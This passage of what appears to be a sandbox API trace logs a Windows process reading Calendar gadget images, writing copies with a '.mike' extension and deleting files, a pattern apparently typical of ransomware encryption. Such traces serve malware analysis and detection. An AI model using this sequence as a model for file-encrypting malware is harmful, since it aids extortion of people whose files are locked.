Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x57 [0131.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.326] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2121510 | out: lpFileInformation=0x2121510*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178feea0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x178feea0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x17925000, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6c0)) returned 1 [0131.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.326] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", dwFileAttributes=0x80) returned 0 [0131.327] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.327] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x57 [0131.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0131.327] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178feea0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x178feea0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x17925000, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6c0)) returned 1 [0131.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0131.327] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.328] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x57 [0131.328] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.mike")) returned 1 [0131.329] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.329] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.329] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0131.329] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0131.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0131.330] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0131.330] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.330] GetFileType (hFile=0x284) returned 0x1 [0131.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0131.330] GetFileType (hFile=0x284) returned 0x1 [0131.330] CloseHandle (hObject=0x284) returned 1 [0131.330] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.331] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.331] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0131.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0131.331] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0131.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.331] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png"), fInfoLevelId=0x0, lpFileInformation=0x2123e40 | out: lpFileInformation=0x2123e40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb378fd7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc9)) returned 1 [0131.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.331] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.331] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png"), fInfoLevelId=0x0, lpFileInformation=0x21241a4 | out: lpFileInformation=0x21241a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb378fd7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc9)) returned 1 [0131.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.331] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.331] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.331] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0131.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.332] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.332] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.332] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.332] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0131.332] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0131.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0131.332] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.332] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.332] GetFileType (hFile=0x284) returned 0x1 [0131.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.333] GetFileType (hFile=0x284) returned 0x1 [0131.333] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0131.333] WriteFile (in: hFile=0x284, lpBuffer=0x212520c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x212520c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.334] CloseHandle (hObject=0x284) returned 1 [0131.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0131.334] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png"), fInfoLevelId=0x0, lpFileInformation=0x2124c98 | out: lpFileInformation=0x2124c98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb378fd7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc9)) returned 1 [0131.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0131.334] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0131.334] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.334] GetFileType (hFile=0x284) returned 0x1 [0131.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0131.334] GetFileType (hFile=0x284) returned 0x1 [0131.334] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.334] ReadFile (in: hFile=0x284, lpBuffer=0x2126360, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2126360*, lpNumberOfBytesRead=0x2af080*=0xc9, lpOverlapped=0x0) returned 1 [0131.337] CloseHandle (hObject=0x284) returned 1 [0131.337] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.338] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.338] WriteFile (in: hFile=0x284, lpBuffer=0x21295b4*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21295b4*, lpNumberOfBytesWritten=0x2af074*=0xd0, lpOverlapped=0x0) returned 1 [0131.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0131.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0131.340] WriteFile (in: hFile=0x284, lpBuffer=0x212c80c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x212c80c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.340] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.341] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.341] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", dwFileAttributes=0x80) returned 0 [0131.342] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x57 [0131.342] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0131.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0131.343] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.344] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", lpFilePart=0x0) returned 0x54 [0131.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0131.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0131.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0131.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0131.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0131.346] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0131.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.347] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.347] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", lpFilePart=0x0) returned 0x54 [0131.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0131.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0131.348] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.348] WriteFile (in: hFile=0x284, lpBuffer=0x2131d48*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2131d48*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0131.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0131.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0131.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0131.350] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.351] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.352] WriteFile (in: hFile=0x284, lpBuffer=0x2136704*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2136704*, lpNumberOfBytesWritten=0x2af074*=0x1a0, lpOverlapped=0x0) returned 1 [0131.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0131.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0131.354] WriteFile (in: hFile=0x284, lpBuffer=0x213994c*, nNumberOfBytesToWrite=0x20c, 